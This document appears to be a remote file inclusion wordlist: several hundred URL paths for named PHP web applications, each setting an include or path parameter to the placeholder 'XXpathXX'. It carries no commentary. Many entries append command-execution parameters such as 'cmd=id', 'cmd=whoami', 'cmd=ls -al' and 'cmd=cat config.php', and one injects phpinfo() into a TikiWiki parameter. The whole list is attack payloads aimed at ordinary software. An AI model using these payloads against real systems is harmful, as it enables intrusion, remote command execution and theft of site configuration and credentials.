/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=XXpathXX
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX?
/modulistica/mdl_save.php?CLASSPATH=XXpathXX
/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX?
/moodle/admin/utfdbmigrate.php?cmd=XXpathXX
/moosegallery/display.php?type=XXpathXX?&cmd=[command]
/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=XXpathXX
/moteur/moteur.php?chemin=XXpathXX?
/movie_cls.php?full_path=XXpathXX
/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
/music/buycd.php?HTTP_DOCUMENT_ROOT=XXpathXX?
/mutant_includes/mutant_functions.php?phpbb_root_path=XXpathXX
/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=XXpathXX
/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=XXpathXX
/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX
/myphpcommander_path/system/lib/package.php?gl_root=XXpathXX?cmd
/mysave.php?file=XXpathXX
/naboard_pnr.php?skin=XXpathXX?
/ncaster/admin/addons/archive/archive.php?adminfolder=XXpathXX
/network_module_selector.php?path_prefix=XXpathXX
/news.php?CONFIG[script_path]=XXpathXX?
/news.php?config[root_ordner]=XXpathXX?&cmd=id
/news.php?scriptpath=XXpathXX?
/news.php?vwar_root=XXpathXX
/news/include/createdb.php?langfile;=XXpathXX?
/news/include/customize.php?l=XXpathXX?
/news/newstopic_inc.php?indir=XXpathXX
/news/scripts/news_page.php?script_path=XXpathXX?
/newsadmin.php?action=XXpathXX
/newsarchive.php?path_to_script=XXpathXX?&cmd=ls
/newsfeeds/includes/aggregator.php?zf_path=XXpathXX
/newsfeeds/includes/controller.php?zf_path=XXpathXX
/newsletter/newsletter.php?waroot=XXpathXX
/newsp/lib/class.Database.php?path=XXpathXX?
/newticket.php?lang=XXpathXX
/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=XXpathXX
/noticias.php?inc=XXpathXX?
/nucleus/plugins/skinfiles/index.php?DIR_LIBS=XXpathXX
/nuke_path/iframe.php?file=XXpathXX
/nukebrowser.php?filnavn=XXpathXX&filhead=XXpathXX&cmd=id
/nuseo/admin/nuseo_admin_d.php?nuseo_dir=XXpathXX?
/oaboard_en/forum.php?inc=XXpathXX
/ocp-103/index.php?req_path=XXpathXX
/ocs/include/footer.inc.php?fullpath=XXpathXX?
/ocs/include/theme.inc.php?fullpath=XXpathXX?
/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=XXpathXX?
/olbookmarks-0.7.4/themes/test1.php?XXpathXX
/oneadmin/adminfoot.php?path[docroot]=XXpathXX
/oneadmin/blogger/sampleblogger.php?path[docroot]=XXpathXX?
/oneadmin/config-bak.php?include_once=XXpathXX
/oneadmin/config.php?path[docroot]=XXpathXX
/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=XXpathXX?
/online.php?config[root_ordner]=XXpathXX?&cmd=id
/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=XXpathXX?
/openi-admin/base/fileloader.php?config[openi_dir]=XXpathXX
/openrat/themes/default/include/html/insert.inc.php?tpl_dir=XXpathXX???
/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=XXpathXX
/ops/gals.php?news_file=XXpathXX
/order/login.php?svr_rootscript=XXpathXX
/osData/php121/php121db.php?php121dir=XXpathXX%00
/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=XXpathXX?
/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=XXpathXX?
/owimg.php3?path=XXpathXX
/p-news.php?pn_lang=XXpathXX
/pafiledb/includes/pafiledb_constants.php?module_root_path=XXpathXX
/page.php?goto=XXpathXX
/page.php?id=XXpathXX
/panel/common/theme/default/header_setup.php?path[docroot]=XXpathXX
/param_editor.php?folder=XXpathXX?
/parse/parser.php?WN_BASEDIR=XXpathXX
/patch/?language_id=XXpathXX
/patch/tools/send_reminders.php?noSet=0&includedir=XXpathXX?
/paypalipn/ipnprocess.php?INC=XXpathXX?
/pda/pda_projects.php?offset=XXpathXX
/phfito/phfito-post?SRC_PATH=XXpathXX
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=XXpathXX
/photo_comment.php?toroot=XXpathXX
/php-inc/log.inc.php?SKIN_URL=XXpathXX
/php-include-robotsservices.php?page=XXpathXX
/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX
/php.incs/common.inc.php?cm_basedir=XXpathXX?
/php/init.gallery.php?include_class=XXpathXX/something
/php121db.php?php121dir=XXpathXX%00
/php4you.php?dir=XXpathXX?
/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=XXpathXX?
/phpBB2/shoutbox.php?phpbb_root_path=XXpathXX
/phpCards.header.php?CardPath=XXpathXX?
/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX
/phpMyChat.php3?=XXpathXX?cmd=id
/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=XXpathXX?
/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=XXpathXX?
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX
/phpbb/sendmsg.php?phpbb_root_path=XXpathXX
/phpcalendar/includes/calendar.php?phpc_root_path=XXpathXX?
/phpcalendar/includes/setup.php?phpc_root_path=XXpathXX?
/phpdebug_PATH/test/debug_test.php?debugClassLocation=XXpathXX
/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=XXpathXX
/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=XXpathXX
/phphd_downloads/common.php?phphd_real_path=XXpathXX
/phphost_directoryv2/include/admin.php?rd=XXpathXX?
/phphtml.php?htmlclass_path=XXpathXX
/phpi/edit_top_feature.php?include_connection=XXpathXX
/phpi/edit_topics_feature.php?include_connection=XXpathXX
/phplib/site_conf.php?ordnertiefe=XXpathXX
/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/referenz.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=XXpathXX
/phplinks/includes/smarty.php?full_path_to_public_program=XXpathXX
/phporacleview/inc/include_all.inc.php?page_dir=XXpathXX?
/phppc/poll.php?is_phppc_included=1&relativer_pfad=XXpathXX?
/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=XXpathXX?
/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=XXpathXX?
/phpquickgallery/gallery_top.inc.php?textFile=XXpathXX
/phpreactor/inc/polls.inc.php?pathtohomedir=XXpathXX?
/phpreactor/inc/updatecms.inc.php?pathtohomedir=XXpathXX?
/phpreactor/inc/users.inc.php?pathtohomedir=XXpathXX?
/phpreactor/inc/view.inc.php?pathtohomedir=XXpathXX?
/phpress/adisplay.php?lang=XXpathXX
/phpunity-postcard.php?plgallery_epost=1&gallery_path=XXpathXX?
/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=XXpathXX
/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=XXpathXX
/phpyabs/moduli/libri/index.php?Azione=XXpathXX
/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=XXpathXX
/playlist.php?phpbb_root_path=XXpathXX
/plugin/HP_DEV/cms2.php?s_dir=XXpathXX?
/plugin/gateway/gnokii/init.php?apps_path[plug]=XXpathXX?
/plugins/1_Adressbuch/delete.php?folder=XXpathXX
/plugins/BackUp/Archive.php?bkpwp_plugin_path=XXpathXX?
/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=XXpathXX?
/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=XXpathXX?
/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=XXpathXX?
/plugins/links/functions.inc?_CONF[path]=XXpathXX
/plugins/polls/functions.inc?_CONF[path]=XXpathXX
/plugins/rss_importer_functions.php?sitepath=XXpathXX?
/plugins/safehtml/HTMLSax3.php?dir[plugins]=XXpathXX?
/plugins/safehtml/safehtml.php?dir[plugins]=XXpathXX?
/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=XXpathXX
/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=XXpathXX
/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=XXpathXX
/plugins/spamx/Import.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/LogView.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=XXpathXX
/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=XXpathXX
/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=XXpathXX
/plugins/staticpages/functions.inc?_CONF[path]=XXpathXX
/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=XXpathXX
/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=XXpathXX
/plus.php?_pages_dir=XXpathXX?
/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=XXpathXX?
/pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX
/pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX?
/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/login.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/recent_list.php?absoluteurl=XXpathXX
/poll/view.php?int_path=XXpathXX
/pollvote.php?pollname=XXpathXX?&cmd=ls
/pop.php?base=XXpathXX
/popup_window.php?site_isp_root=XXpathXX?
/port.php?content=XXpathXX
/portal/includes/portal_block.php?phpbb_root_path=XXpathXX
/portal/portal.php?phpbb_root_path=XXpathXX?
/portfolio.php?id=XXpathXX
/portfolio/commentaires/derniers_commentaires.php?rep=XXpathXX?
/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=XXpathXX
/prepare.php?xcart_dir=XXpathXX?
/prepend.php?_PX_config[manager_path]=XXpathXX
/preview.php?php_script_path=XXpathXX?&cmd=dir
/principal.php?conteudo=XXpathXX
/print.php?page=XXpathXX
/print.php?pager=XXpathXX
/print.php?print=XXpathXX?
/process.php?DEFAULT_SKIN=XXpathXX
/professeurs/index.php?repertoire_config=XXpathXX
/profil.php?config[root_ordner]=XXpathXX?&cmd=id
/projects/weatimages/demo/index.php?ini[langpack]=XXpathXX
/promocms/newspublish/include.php?path[bdocroot]=XXpathXX
/protection.php?logout_page=XXpathXX?
/provider/auth.php?xcart_dir=XXpathXX?
/psynch/nph-psa.exe?css=XXpathXX
/psynch/nph-psf.exe?css=XXpathXX
/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=XXpathXX?
/public_html/modules/Forums/favorites.php?nuke_bb_root_path=XXpathXX?
/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=XXpathXX
/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=XXpathXX
/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=XXpathXX?
/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=XXpathXX?
/qte_web.php?qte_web_path=XXpathXX?
/quick_reply.php?phpbb_root_path=XXpathXX&mode=[file]
/quickie.php?QUICK_PATH=XXpathXX?&cmd=id
/random2.php?path_to_folder=XXpathXX
/randshop/index.php?incl=XXpathXX?
/rdf.php?page[path]=XXpathXX?&cmd=ls
/reactivate.php?base_dir=XXpathXX
/read.php?data=XXpathXX?
/readmore.php?config["sipssys"]=XXpathXX
/recent.php?insPath=XXpathXX
/rechnung.php?_PHPLIB[libdir]=XXpathXX?
/reconfig.php?GLOBALS[CLPath]=XXpathXX
/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=XXpathXX
/redirect.php?url=XXpathXX
/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=XXpathXX
/register.php?base_dir=XXpathXX
/releasenote.php?mosConfig_absolute_path=XXpathXX
/rempass.php?lang=XXpathXX
/report.php?scriptpath=XXpathXX?
/reports/who_r.php?bj=XXpathXX
/resources/includes/class.Smarty.php?cfg[sys][base_path]=XXpathXX
/ressourcen/dbopen.php?home=XXpathXX?
/robotstats.inc.php?DOCUMENT_ROOT=XXpathXX?
/root/public/code/cp_html2txt.php?page=XXpathXX
/routines/fieldValidation.php?jssShopFileSystem=XXpathXX
/rspa/framework/Controller_v4.php?__ClassPath=XXpathXX
/rspa/framework/Controller_v4.php?__ClassPath=XXpathXX?
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX?
/rss.php?page[path]=XXpathXX?&cmd=ls
/rss.php?phpraid_dir=XXpathXX
/rss.php?premodDir=XXpathXX
/rss2.php?page[path]=XXpathXX?&cmd=ls
/run.php?dir=SHELL?&file=XXpathXX
/s01.php?shopid=XXpathXX
/s01.php?shopid=XXpathXX?
/s02.php?shopid=XXpathXX?
/s03.php?shopid=XXpathXX?
/s04.php?shopid=XXpathXX?
/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=XXpathXX
/sablonlar/gunaysoft/gunaysoft.php?sayfaid=XXpathXX
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX?
/sample/xls2mysql/parser_path=XXpathXX?
/save.php?file_save=XXpathXX
/saveserver.php?thisdir=XXpathXX
/script//ident/index.php?path_inc=XXpathXX
/script/_conf/core/common-tpl-vars.php?confdir=XXpathXX?
/script/common.inc.php?path_inc=XXpathXX
/script/gestion/index.php?path_inc=XXpathXX
/script/ident/disconnect.php?path_inc=XXpathXX
/script/ident/ident.inc.php?path_inc=XXpathXX
/script/ident/identification.php?path_inc=XXpathXX
/script/ident/loginliste.php?path_inc=XXpathXX
/script/ident/loginmodif.php?path_inc=XXpathXX
/script/index.php?path_inc=XXpathXX
/script/init/createallimagecache.php?PATH_TO_CODE=XXpathXX
/script/menu/menuadministration.php?path_inc=XXpathXX
/script/menu/menuprincipal.php?path_inc=XXpathXX
/script/param/param.inc.php?path_inc=XXpathXX
/script/plugins/phpgacl/admin/index.php?path_inc=XXpathXX
/script/template/index.php?main_page_directory=XXpathXX
/script/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX
/script/tick/test.php?PATH_TO_CODE=XXpathXX
/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=XXpathXX?
/script_path/cms/classes/openengine/filepool.php?oe_classpath=XXpathXX?
/script_path/installation/index.php?mosConfig_absolute_path=XXpathXX?
/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=XXpathXX
/scripts/check-lom.php?ETCDIR=XXpathXX
/scripts/gallery.scr.php?GLOBALS[PTH][func]=XXpathXX?
/scripts/lom_update.php?ETCDIR=XXpathXX
/scripts/news.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/polls.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/rss.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/search.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/weigh_keywords.php?ETCDIR=XXpathXX
/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=XXpathXX?
/search.php?config["sipssys"]=XXpathXX
/search.php?id=XXpathXX
/search.php?insPath=XXpathXX
/search/submit.php?config["sipssys"]=XXpathXX
/search_wA.php?LIBPATH=XXpathXX
/searchbot.php?path=XXpathXX
/security/include/_class.security.php?PHPSECURITYADMIN_PATH=XXpathXX
/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=XXpathXX?
/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=XXpathXX?
/senetman/html/index.php?page=XXpathXX
/services.php?page=XXpathXX
/services/samples/inclusionService.php?CabronServiceFolder=XXpathXX%00
/settings.php?P[includes]=XXpathXX
/settings_sql.php?path=XXpathXX
/setup/inc/database.php?tcms_administer_site=XXpathXX
/setup/upgrader.php?RootDirectory=XXpathXX
/sezhoo/SezHooTabsAndActions.php?IP=XXpathXX
/shop/includes/header.inc.php?dateiPfad=XXpathXX
/shop/index.php?action=XXpathXX?&cmd=cat%20config.php
/shop/page.php?osCsid=XXpathXX?
/shop/page.php?pageid=XXpathXX?
/shoutbox.php?language=XXpathXX
/shoutbox.php?root=XXpathXX?cmd=id
/show.php?file=XXpathXX
/show.php?id=XXpathXX
/show.php?page=XXpathXX
/show.php?path=XXpathXX
/show_archives.php?cutepath=XXpathXX?
/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=XXpathXX
/sid=XXpathXX
/signer/final.php?smiley=XXpathXX?
/signin.php?sent=1&AMG_serverpath=XXpathXX
/sinagb.php?fuss=XXpathXX
/sinapis.php?fuss=XXpathXX
/sitebar/Integrator.php?file=XXpathXX
/sitebar/index.php?writerFile=XXpathXX
/sitebuilder/admin/top.php?admindir=XXpathXX
/sitemap.xml.php?dir[classes]=XXpathXX
/skin/board/default/doctype.php?dir=XXpathXX
/skin/dark/template.php?path=XXpathXX
/skin/gold/template.php?path=XXpathXX
/skin/html/table.php?pachtofile=XXpathXX
/skin/original/template.php?path=XXpathXX
/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=XXpathXX
/skins/advanced/advanced1.php?pluginpath[0]=XXpathXX
/skins/default.php?dir_inc=XXpathXX
/skins/header.php?ote_home=XXpathXX
/skins/phpchess/layout_admin_cfg.php?Root_Path=XXpathXX
/skins/phpchess/layout_cfg.php?Root_Path=XXpathXX
/skins/phpchess/layout_t_top.php?Root_Path=XXpathXX
/skysilver/login.tpl.php?theme=XXpathXX?
/slogin_lib.inc.php?slogin_path=XXpathXX?
/smarty.php?xcart_dir=XXpathXX?
/smarty/smarty_class.php?_smarty_compile_path=XXpathXX
/smilies.php?config=XXpathXX
/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX?
/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=XXpathXX?
/snort/base_stat_common.php?BASE_path=XXpathXX
/social_game_play.php?path=XXpathXX?
/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=XXpathXX
/song.php?phpbb_root_path=XXpathXX
/source.php?bibtexrootrel=XXpathXX?
/source/mod/rss/channeledit.php?Codebase=XXpathXX
/source/mod/rss/post.php?Codebase=XXpathXX
/source/mod/rss/view.php?Codebase=XXpathXX
/source/mod/rss/viewitem.php?Codebase=XXpathXX
/sources/Admin/admin_cats.php?CONFIG[main_path]=XXpathXX
/sources/Admin/admin_edit.php?CONFIG[main_path]=XXpathXX
/sources/Admin/admin_import.php?CONFIG[main_path]=XXpathXX
/sources/Admin/admin_templates.php?CONFIG[main_path]=XXpathXX
/sources/functions.php?CONFIG[main_path]=XXpathXX
/sources/help.php?CONFIG[main_path]=XXpathXX
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=XXpathXX
/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=XXpathXX
/sources/mail.php?CONFIG[main_path]=XXpathXX
/sources/misc/new_day.php?path=XXpathXX
/sources/news.php?CONFIG[main_path]=XXpathXX
/sources/post.php?fil_config=XXpathXX
/sources/template.php?CONFIG[main_path]=XXpathXX
/sources/tourney/index.php?page=XXpathXX?
/spaw/spaw_control.class.php?GLOBALS[spaw_root]=XXpathXX
/spaw/spaw_control.class.php?spaw_root=XXpathXX
/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=XXpathXX
/spellcheckwindowframeset.php?SpellIncPath=XXpathXX
/squirrelcart/cart_content.php?cart_isp_root=XXpathXX
/src/ark_inc.php?cfg_pear_path=XXpathXX?
/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=XXpathXX
/src/scripture.php?pageHeaderFile=XXpathXX?
/starnet/themes/c-sky/main.inc.php?cmsdir=XXpathXX?
/start.php?lang=XXpathXX
/start.php?pg=XXpathXX
/stat_modules/users_age/module.php?phpbb_root_path=XXpathXX
/stats.php?vwar_root=XXpathXX
/stphpapplication.php?STPHPLIB_DIR=XXpathXX
/stphpbtnimage.php?STPHPLIB_DIR=XXpathXX
/stphpform.php?STPHPLIB_DIR=XXpathXX
/str.php?p=XXpathXX
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX?
/strload.php?LangFile=XXpathXX
/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=XXpathXX?
/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=XXpathXX?
/styles.php?toroot=XXpathXX
/styles/default/global_header.php?installed=23&domain=XXpathXX
/submit_abuse.php?path_prefix=XXpathXX
/submit_comment.php?path_prefix=XXpathXX
/subscp.php?phpbb_root_path=XXpathXX?
/suite/index.php?pg=XXpathXX?
/supasite/admin_auth_cookies.php?supa[db_path]=XXpathXX
/supasite/admin_mods.php?supa[db_path]=XXpathXX
/supasite/admin_news.php?supa[db_path]=XXpathXX
/supasite/admin_settings.php?supa[include_path]=XXpathXX
/supasite/admin_topics.php?supa[db_path]=XXpathXX
/supasite/admin_users.php?supa[db_path]=XXpathXX
/supasite/admin_utilities.php?supa[db_path]=XXpathXX
/supasite/backend_site.php?supa[include_path]=XXpathXX
/supasite/common_functions.php?supa[db_path]=XXpathXX
/supasite/site_comment.php?supa[db_path]=XXpathXX
/supasite/site_news.php?supa[db_path]=XXpathXX
/support/include/open_form.php?include_dir=XXpathXX?cmd=pwd
/support/index.php?main=XXpathXX
/surveys/survey.inc.php?path=XXpathXX
/sw/lib_comment/comment.php?doc_directory=XXpathXX?
/sw/lib_find/find.php?doc_directory=XXpathXX?
/sw/lib_session/session.php?doc_directory=XXpathXX?
/sw/lib_up_file/file.php?doc_directory=XXpathXX?
/sw/lib_up_file/find_file.php?doc_directory=XXpathXX?
/sw/lib_user/find_user.php?doc_directory=XXpathXX?
/sw/lib_user/user.php?doc_directory=XXpathXX?
/sys/code/box.inc.php?config["sipssys"]=XXpathXX
/system/ImageImageMagick.php?glConf[path_system]=XXpathXX?
/system/_b/contentFiles/gBIndex.php?gBRootPath=XXpathXX?
/system/admin/include/item_main.php?GLOBALS=XXpathXX
/system/admin/include/upload_form.php?GLOBALS=XXpathXX
/system/command/admin.cmd.php?GLOBALS=XXpathXX
/system/command/download.cmd.php?GLOBALS=XXpathXX
/system/funcs/xkurl.php?PEARPATH=XXpathXX
/system/includes/pageheaderdefault.inc.php?_sysSessionPath=XXpathXX
/system/login.php?site_path=XXpathXX
/tagit2b/tagmin/delTagUser.php?configpath=XXpathXX?
/tags.php?BBCodeFile=XXpathXX
/taxonservice.php?dir=XXpathXX?
/teatro/pub/pub08_comments.php?basePath=XXpathXX
/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=XXpathXX?
/template.php?actionsPage=XXpathXX?
/template.php?blog_theme=XXpathXX
/template.php?pagina=XXpathXX
/template/Noir/index.php?site_path=XXpathXX
/template/Vert/index.php?pageAll=XXpathXX
/template/Vert/index.php?site_path=XXpathXX
/template/barnraiser_01/p_new_password.tpl.php?templatePath=XXpathXX
/template/default/footer.php?ROOT_PATH=XXpathXX?cmd=ls
/template/default/test/header.php?ROOT_PATH=XXpathXX?cmd=ls
/template/gwb/user_bottom.php?config[template_path]=XXpathXX
/template/purpletech/base_include.php?page=XXpathXX?
/template/rwb/user_bottom.php?config[template_path]=XXpathXX
/template_csv.php?rInfo[content]=XXpathXX
/templates/2blue/bodyTemplate.php?serverPath=XXpathXX?
/templates/Official/part_userprofile.php?template_path=XXpathXX
/templates/barrel/template.tpl.php?renderer=XXpathXX
/templates/barrel/template.tpl.php?renderer=XXpathXX?
/templates/barry/template.tpl.php?renderer=XXpathXX
/templates/be2004-2/index.php?mosConfig_absolute_path=XXpathXX
/templates/datumVonDatumBis.inc.php?root=XXpathXX
/templates/default/header.inc.php?menu=XXpathXX
/templates/default/index_logged.php?main_loaded=1&cur_module=XXpathXX
/templates/default/tpl_message.php?right_file=XXpathXX
/templates/footer.inc.php?root=XXpathXX
/templates/header.inc.php?root=XXpathXX
/templates/mylook/template.tpl.php?renderer=XXpathXX
/templates/oerdec/template.tpl.php?renderer=XXpathXX
/templates/pb/language/lang_nl.php?temppath=XXpathXX
/templates/penguin/template.tpl.php?renderer=XXpathXX
/templates/sidebar/template.tpl.php?renderer=XXpathXX
/templates/slashdot/template.tpl.php?renderer=XXpathXX
/templates/stylesheets.php?root=XXpathXX
/templates/text-only/template.tpl.php?renderer=XXpathXX
/templates/tmpl_dfl/scripts/index.php?dir[inc]=XXpathXX
/theme/breadcrumb.php?rootBase=XXpathXX?
/theme/default.php?root=XXpathXX
/theme/format.php?_page_content=XXpathXX?
/theme/format.php?_page_css=XXpathXX?
/theme/frames1.php?root=XXpathXX
/theme/frames1_center.php?root=XXpathXX
/theme/frames1_left.php?root=XXpathXX
/theme/frames1_top.php?root=XXpathXX
/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=XXpathXX
/theme/settings.php?pfad_z=XXpathXX
/theme/test1.php?root=XXpathXX
/theme/test2.php?root=XXpathXX
/theme/test3.php?root=XXpathXX
/theme/test4.php?root=XXpathXX
/theme/test5.php?root=XXpathXX
/theme/test6.php?root=XXpathXX
/themes.php?GLOBALS[theme_path]=XXpathXX?
/themes/blackorange.php?root=XXpathXX
/themes/container.php?theme_directory=XXpathXX%00
/themes/default/layouts/standard.php?page_include=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
/themes/default/preview_post_completo.php?dir=XXpathXX
/themes/header.php?theme_directory=XXpathXX%00
/themes/ubb/login.php?theme=XXpathXX
/themes/ubb/login.php?theme=XXpathXX?
/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=XXpathXX
/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=XXpathXX
/timedifference.php?la=XXpathXX
/toolbar.loudmouth.php?mainframe=XXpathXX
/tools/update_translations.php?_SESSION[path]=XXpathXX?
/top.php?laypath=XXpathXX
/toplist.php?f=toplist_top10&phpbb_root_path=XXpathXX
/topsites/index.php?page=XXpathXX?&
/towels-0.1/src/scripture.php?pageHeaderFile=XXpathXX
/track.php?path=XXpathXX
